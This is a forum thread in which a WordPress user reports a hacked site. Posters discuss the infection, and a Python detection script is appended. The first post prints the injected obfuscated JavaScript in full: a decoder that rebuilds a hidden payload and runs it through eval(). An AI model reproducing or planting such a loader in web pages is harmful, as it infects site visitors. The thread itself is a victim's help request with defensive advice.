Help...My Site was Hacked? (3 posts)

  1. Lilego
    Posted 6 years ago #

    Hi Guys

    I just started using WordPress and when I visited my site today, it said there was a syntax error loading wp-admin/includes/template.php on line 3275.

    I reloaded my site, and my virus scanner brought up this virus

    I checked the code on line 3275 and found that 3 lines were added to the original WordPress code. And at the end of </script> it shows <!-- myotherwebsite.com --> which is another website I have WordPress on!

    If you can help me figure out what's wrong that'd be great. Thanks guys

    <script language=JavaScript>function xb3b23(x) { var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,0,7,59,18,19,15,14,16,39,0,0,0,0,0,0,58,54,26,20,6,23,30,46,52,8,38,24,55,33,56,57,28,32,25,42,62,10,4,43,17,50,12,0,0,0,0,41,0,40,29,45,1,48,49,47,22,34,53,37,61,60,9,35,3,2,27,51,36,5,21,44,11,13,31);for(g=Math.ceil(y/c);g>0;g--){q='';for(z=Math.min(y,c);z>0;z--,y--){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(197^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}xb3b23('YY@SMSSwWrrwtDxwAigNdS@SQUG0MSS_eiUaWD3@YFxWfqB3i96WoFx_aqBOW4USQi0a94SmJhGcLBUT9LBwfh30SWF0tDBawDxWSG@@SFWaS2W@@xG3I4BwcGTcSq3SMA7itDrWWzx_WDSSaA73gz6ll50mw3GNoFU_YrSNGxTOkxxWMDrWNrzlAEFWQYSacDxTYzzOADxg_qUT92UWAhrStY30WS@SQFTTOW7WoFx_aq@Tis7')</script><!-- myotherwebsite.com -->

  2. jonnyd
    Posted 6 years ago #


    Did you get anywhere with this?
    I too am getting similar 8addition.org virus alerts.

    I will be upgrading to 2.7.1; does anyone know if this sorts the problem?

    Also what are the permissions on your files?



  3. trevornetley
    Posted 6 years ago #

    I'm not currently a WordPress user, but I can tell you that your web host has been intruded like many, many others. You should contact your hosting company. You need to remove the offending item from your source file and re-do everything.

    It happened to me (I'm with web-mania.com) and all my index.htm and home.htm files were infected, both with something very similar to the script you describe and with an extraneous <form> entry. I also had an infection in my cgi-bin directory which I had to remove manually. I was able to clear all the rest by uploading fresh copies of all infected files from my local backup, but that may not be much help to you?

    Note that you can submit the script to http://wepawet.iseclab.org/index.php and it will 'de-obfuscate' it for you - then you'll see where 8addition came from!

    Hope this helps
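
A defender-side check for the kind of injection described in this thread, as an added example that is not from any of the posters: it flags `<script>` blocks that combine `eval`, `String.fromCharCode`, `charCodeAt` and a long encoded string literal, and reports the line where each block starts. The trait list, the threshold, the file suffixes and both sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Whole <script>...</script> blocks, case-insensitive, spanning lines.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Traits of the injected block quoted in the thread: a decoder that rebuilds
# code with String.fromCharCode/charCodeAt and runs the result through eval().
TRAITS = {
    "eval": re.compile(r"\beval\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "charCodeAt": re.compile(r"\.charCodeAt\s*\("),
    "long_literal": re.compile(r"""(['"])[^'"\s]{80,}\1"""),
}
THRESHOLD = 3  # assumption: 3 of the 4 traits marks a block as suspicious


def scan_text(text):
    """Return (line_number, matched_traits) for each suspicious script block."""
    hits = []
    for m in SCRIPT_RE.finditer(text):
        found = sorted(n for n, rx in TRAITS.items() if rx.search(m.group(1)))
        if len(found) >= THRESHOLD:
            hits.append((text.count("\n", 0, m.start()) + 1, found))
    return hits


def scan_tree(root, suffixes=(".php", ".htm", ".html")):
    """Scan matching files under root; return {path: hits} for flagged files."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed samples (not the payload posted in the thread).
CLEAN = "<?php echo 'hi'; ?>\n<script>document.title = String.fromCharCode(72);</script>\n"
INJECTED = (
    "<?php // template code\n?>\n"
    "<script language=JavaScript>function d(x){var q='';"
    "for(var i=0;i<x.length;i++){q+=String.fromCharCode(x.charCodeAt(i)^1)}"
    "eval(q)}d('" + "A" * 120 + "')</script><!-- example.invalid -->\n"
)

if __name__ == "__main__":
    print(scan_text(CLEAN), scan_text(INJECTED))
```

A hit is a prompt to compare the file against a known-good copy, not proof of infection; legitimate packed scripts can share these traits.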
